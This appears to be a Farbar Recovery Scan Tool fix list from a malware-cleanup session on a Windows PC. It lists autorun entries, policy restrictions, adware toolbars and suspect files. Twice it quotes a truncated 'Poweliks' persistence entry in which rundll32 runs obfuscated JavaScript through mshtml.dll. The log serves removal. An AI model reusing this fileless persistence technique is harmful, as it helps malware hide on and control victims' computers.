HKLM-x32\...\Run: [NWEReboot] => [X] HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\RunOnce: [Adobe Speed Launcher] => 1418680399 HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1825dfb8-901b-11df-ac7a-001bfcdb2b00} - F:\setup.exe -a HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {1a642ce1-fa1b-11e2-a7cc-001bfcdb2b00} - H:\KDMElite.exe HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {40be6538-fd3f-11de-bc3d-001bfcdb2b00} - E:\Autoplay.exe -auto HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {8ec01e68-0b46-11e4-90c1-001bfcdb2b00} - G:\MotoCastSetup.exe -a HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {d39a215e-12aa-11e2-9a43-001bfcdb2b00} - G:\MotoCastSetup.exe -a HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...\MountPoints2: {f68261b2-e74c-11de-bc75-001bfcdb2b00} - F:\SETUP.EXE HKU\S-1-5-21-2526012750-3186116482-2568347101-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks! HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\RunOnce: [Adobe Speed Launcher] => 1418684812 HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-2526012750-3186116482-2568347101-1005\...\MountPoints2: {2ff0a168-70b4-11e4-bba4-001bfcdb2b00} - H:\VerizonSWUpgradeAssistantLauncher.exe GroupPolicyUsers\S-1-5-21-2526012750-3186116482-2568347101-1005\User: Group Policy restriction detected <======= ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> {5C64BA7A-11B0-4609-B099-C4FC0DA8D856} URL = http://search.avg.co...}&ychte=us&nt=1 SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms} SearchScopes: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={137244B2-7857-4E68-9CF5-46DD514DE27F}&mid=25e551794be5d82260c1c81e1e4b42aa-268e993bd84c66e058eb84a7569d70ada5bb6563&lang=en&ds=AVG&coid=avgtbavg&cmpid=1214tb&pr=fr&d=2014-02-05 21:32:45&v=18.2.0.829&pid=safeguard&sg=0&sap=dsp&q={searchTerms} BHO-x32: ZD Manager IE Plugin -> {18D6D197-45BB-465B-ADC0-274A70B49B55} -> C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManager.dll () C:\Program Files (x86)\ZD Systems Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {C55BBCD6-41AD-48AD-9953-3609C48EACC7} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File Toolbar: HKU\S-1-5-21-2526012750-3186116482-2568347101-1005 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.2.0\\npsitesafety.dll No File CHR HKLM\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.googl...jjmlmojhbllhbho [Not Found] CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - No Path CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.googl...jjmlmojhbllhbho [Not Found] S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.) R2 vToolbarUpdater18.2.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\ToolbarUpdater.exe [1806872 2014-12-09] (AVG Secure Search) S4 ZDManager Service; C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManagerService.exe [176640 2012-11-07] () [File not signed] U3 aq763zn8; C:\Windows\System32\Drivers\aq763zn8.sys [0 ] (Microsoft Corporation) C:\Windows\System32\Drivers\aq763zn8.sys 2014-12-15 16:53 - 2014-12-15 16:53 - 00000000 ____D () C:\Users\Chris\AppData\Local\{982048E2-F993-44D8-B18F-A8FBDA99067E} 2014-12-05 08:29 - 2014-12-05 08:29 - 00000000 ____D () C:\Users\Chris\AppData\Local\{6D03B67E-B190-4D63-909C-23B037963DAF} 2014-11-29 14:21 - 2014-11-29 14:21 - 00000000 ____D () C:\Users\Chris\AppData\Local\{F90F4DEB-195B-453B-817C-C3825431B3D0} 2014-11-25 16:55 - 2014-11-25 16:55 - 00000000 ____D () C:\Users\Chris\AppData\Local\{37A3466C-5BD0-4F27-B793-690772C0A43F} 2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\ProgramData\VSO 2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\Program Files (x86)\VSO 2014-12-13 07:19 - 2009-12-30 21:00 - 00000055 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.log 2014-12-13 07:19 - 2009-12-30 20:59 - 00099384 _____ () C:\Users\Chris\AppData\Roaming\inst.exe 2014-12-13 07:19 - 2009-12-30 20:59 - 00082816 _____ (VSO Software) C:\Users\Chris\AppData\Roaming\pcouffin.sys 2014-12-13 07:19 - 2009-12-30 20:59 - 00007859 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.cat 2014-12-13 07:19 - 2009-12-30 20:59 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Vso CustomCLSID: HKU\S-1-5-21-2526012750-3186116482-2568347101-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks? AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4 C:\Program Files (x86)\AVG SafeGuard toolbar 2014-12-13 06:55 - 2009-12-10 21:46 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\uTorrent EmptyTemp: